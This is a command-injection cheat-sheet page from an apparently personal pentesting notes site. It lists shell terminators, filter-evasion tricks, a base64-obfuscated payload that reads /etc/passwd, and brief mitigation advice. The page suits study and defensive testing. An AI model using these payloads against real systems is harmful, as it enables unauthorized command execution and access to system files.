📖
sheepwall
  • Overview
  • Cloud Hacking
    • Azure
  • Hacking
    • Recon
      • Nmap
      • Website Recon
      • Service Enumeration
    • Exploitation
      • GraphQL
      • Application Attacks
      • Web Server Attacks
      • JSON attacks
      • CMS attacks
      • SQL Injection
      • Cross Site Scripting
      • Command Injection
      • SSRF
      • SSTI
      • Server Includes
      • XXE
      • WSDL/SOAP
      • Serialization Attacks
      • Cryptography
      • JWT
    • Installation
      • File Uploads
      • File Transfers
    • Actions on Objectives
      • Networking
      • Linux
    • Tools
    • Windows
      • 1. Getting Foothold
      • 2. Windows Exploitation
      • 3. Enumerating Active Directory
      • 4. Dumping Credentials
      • 5. Lateral Movement
      • 6. Persistence
      • 7. Active Directory
      • 8. LAPS
  • Bug Bounties
    • SSRF to Envoy Admin Page
    • Leaky Error Messages
    • HTTP verb tampering results in administrator role to the application
  • APT Information
    • DFIR Summary
Powered by GitBook
On this page
  • Terminators
  • Special Character Bypass
  • Blacklist Bypass
  • Mitigation
  1. Hacking
  2. Exploitation

Command Injection

Linux based command injections

Terminators

Name
ASCII
Hex

Semicolon

;

%3b

Newline

\n

$0a

Background

&

%26

Pipe

|

%7c

And

&&

%26%26

Or

||

%7c%7c

Backticks

``

%60%60

Sub-Shell

$()

%24%28%29

Special Character Bypass

Bypass
Description

%09

Tabs instead of spaces

${IFS}

Used as a space

{ls,-la}

Commas will be interpreted as a space

${PATH:0:1}

Will be replaced by /

${LS_COLORS:10:1}

Will be replaced by ;

Blacklist Bypass

Bypass
Description

$(rev<<<'imaohw')

Reversing strings

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

Base64 Decoding

wHoAmi

Case Manipulation

Mitigation

Avoid using functions that execute system commands, especially when using user inputs

Proper Input Validation and Sanitization on the Front-end and Back-end

Secure Server Configuration and Principle of Least Privileges

  • The processes and services should not be running as root, so command injection will run at the least privilege possible

  • Ensure proper RWX permissions to files and folders to reduce the scope of RCE

PreviousCross Site ScriptingNextSSRF

Last updated 2 years ago